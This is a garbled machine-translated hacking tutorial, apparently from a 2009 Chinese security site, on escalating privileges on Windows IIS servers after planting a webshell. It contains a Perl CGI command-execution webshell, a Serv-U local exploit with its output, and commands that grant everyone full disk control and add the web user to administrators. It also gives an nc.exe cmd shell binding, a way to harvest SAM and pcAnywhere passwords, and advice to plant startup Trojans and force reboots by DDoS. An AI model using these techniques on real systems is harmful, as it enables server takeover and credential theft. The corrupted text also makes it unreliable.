Improve(web)Access ultimate 9 tips-vulnerability warning-the black bar safety net

ID MYHACK58:62200923591
Type myhack58
Reporter 佚名
Modified 2009-06-15T00:00:00


When we get a webshell when next you want to do is elevate privileges Personal summary as follows: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ See if you can jump to this directory, if the line that is the best, and directly under it the CIF file, get the pcAnywhere password, login 2. C:\WINNT\system32\config\ In here it's the SAM, crack the user's password With to crack sam password the software with LC, SAMinside 3. C:\Documents and Settings\All Users\Start Menu\Programs\ Look here to jump No, we're from here, you can get a lot of useful information You can see a lot of shortcuts, we generally choose Serv-U, then the local view the properties, know the path, see if you can jump Once inside, if the permission to modify the ServUDaemon. ini, add a user up, the password is empty [USER=WekweN|1] Password= HomeDir=c:\ TimeOut=6 0 0 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues= This user has the highest permissions, and then we can ftp up the quote site exec xxx to elevate permissions

  1. c:\winnt\system32\inetsrv\data\ This is the directory, the same is erveryone full control, we have to do is put an elevated tool upload go up, and then perform the
  2. See if you can jump to the following directory c:\php with phpspy c:\prel sometimes is not necessarily the directory(the same can by download a shortcut to see the properties of the know)with cgi webshell

!/ usr/bin/perl

binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 2 7); $ = $ENV{QUERY_STRING}; s/%2 0/ /ig; s/%2f/\//ig; $execthis = $; syswrite(STDOUT,"

\r\n", 1 3);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n \r\n", 1 7); close(STDERR); close(STDOUT); exit; Save for the cgi execution, If not, you can try the pl extension to it, put just the cgi files to pl files, submit http://anyhost// Display"access denied", that can perform! Immediately submit: 先的上传个su.exe(ser-u elevation of the tool)to prel bin directory http://anyhost//\perl\bin\su.exe Returns: Serv-u >3. x Local Exploit by xiaolu USAGE: serv-u.exe "command" Example: serv-u.exe "nc.exe -l-p 9 9-e cmd.exe" Now is the IUSR permissions, submit: http://anyhost//\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F" http://anyhost//\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F" If returns the following information, it indicates success. Serv-u >3. x Local Exploit by xiaolu <2 2 0 Serv-U FTP Server v5. 2 for WinSock ready... >USER LocalAdministrator <3 3 1 User name okay, need password.

>PASS #l@$ak#. lk;0@P <2 3 0 User logged in, proceed.


[+] Creating New Domain... <2 0 0-DomainID=2 <2 2 0 Domain settings saved

[+] Domain xl:2 Created [+] Creating Evil User <2 0 0-User=xl 2 0 0 User settings saved

[+] Now Exploiting... >USER xl <3 3 1 User name okay, need password.

>PASS 1 1 1 1 1 1 <2 3 0 User logged in, proceed.

[+] Now Executing: cacls.exe c: /E /T /G everyone:F <2 2 0 Domain deleted Thus all partition as everyone full control Now we put their user promoted to administrator: http://anyhost//\perl\bin\su.exe "net localgroup administrators IUSR_anyhost /add"

  1. You can successfully run"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"to elevate permissions With this cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps View have the privilege of the dll file: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll Then the asp. dll join the privileged family of asp.dll 是 放 在 c:\winnt\system32\inetsrv\asp.dll (the different subsystems put in the position not necessarily the same) We now added cscript adsutil. vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll" You can use cscript adsutil. vbs get /W3SVC/InProcessIsapiApps to view is not added to the list.
  2. You can also use this code to try to enhance, as if the effect is not obvious <

Use this code to check whether the upgrade is successful

  1. C:\Program Files\Java Web Start\ Here if you can, generally very small, you can try to use a jsp webshell, I heard that permission is very small, I had not met before.
  2. Finally, if the host setting is the metamorphosis, you can try the following in c:\Documents and Settings\All Users\Start Menu\Programs\Startup"write bat, vbs, etc. Trojan. Wait for the host to restart or yourddosto force it to restart, to reach elevated objects.